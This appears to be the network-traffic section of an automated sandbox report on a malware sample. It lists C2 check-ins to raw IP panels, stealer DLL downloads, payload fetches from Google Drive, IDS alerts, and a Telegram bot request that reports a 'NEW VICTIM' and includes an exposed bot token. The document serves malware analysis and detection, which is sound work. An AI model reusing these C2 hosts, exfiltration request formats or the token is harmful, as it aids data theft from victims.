                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49787 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49804 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49806 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49814 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49823 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49831 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49822 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49830 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49832 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49844 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49851 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49837 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49858 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49852 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49875 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49863 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49876 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49872 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49843 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49885 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49897 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49947 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49914 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49980 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50004 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50026 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50060 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50068 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50069 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50096 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50120 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50125 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50134 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50128 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50121 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50140 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50141 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50157 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50162 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50158 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50168 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50169 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50163 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50177 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50178 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50180 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50174 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50185 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50189 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50186 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50205 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50203 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50222 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50238 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50240 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50241 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50242 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50246 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50250 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50253 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50263 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50264 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50254 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50276 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50274 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50247 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50284 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50286 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50292 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50287 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50291 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50298 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50299 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50304 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50517 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50526 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50533 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50527 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50541 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50520 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50523 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50614 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50544 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50636 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50622 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50639 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50618 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50624 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50633 -> 104.21.89.115:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50616 -> 104.21.89.115:443
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085E0C0 recv,recv,recv,recv,0_2_0085E0C0
                              Source: global trafficHTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20715575%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                              Source: global trafficHTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20715575%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
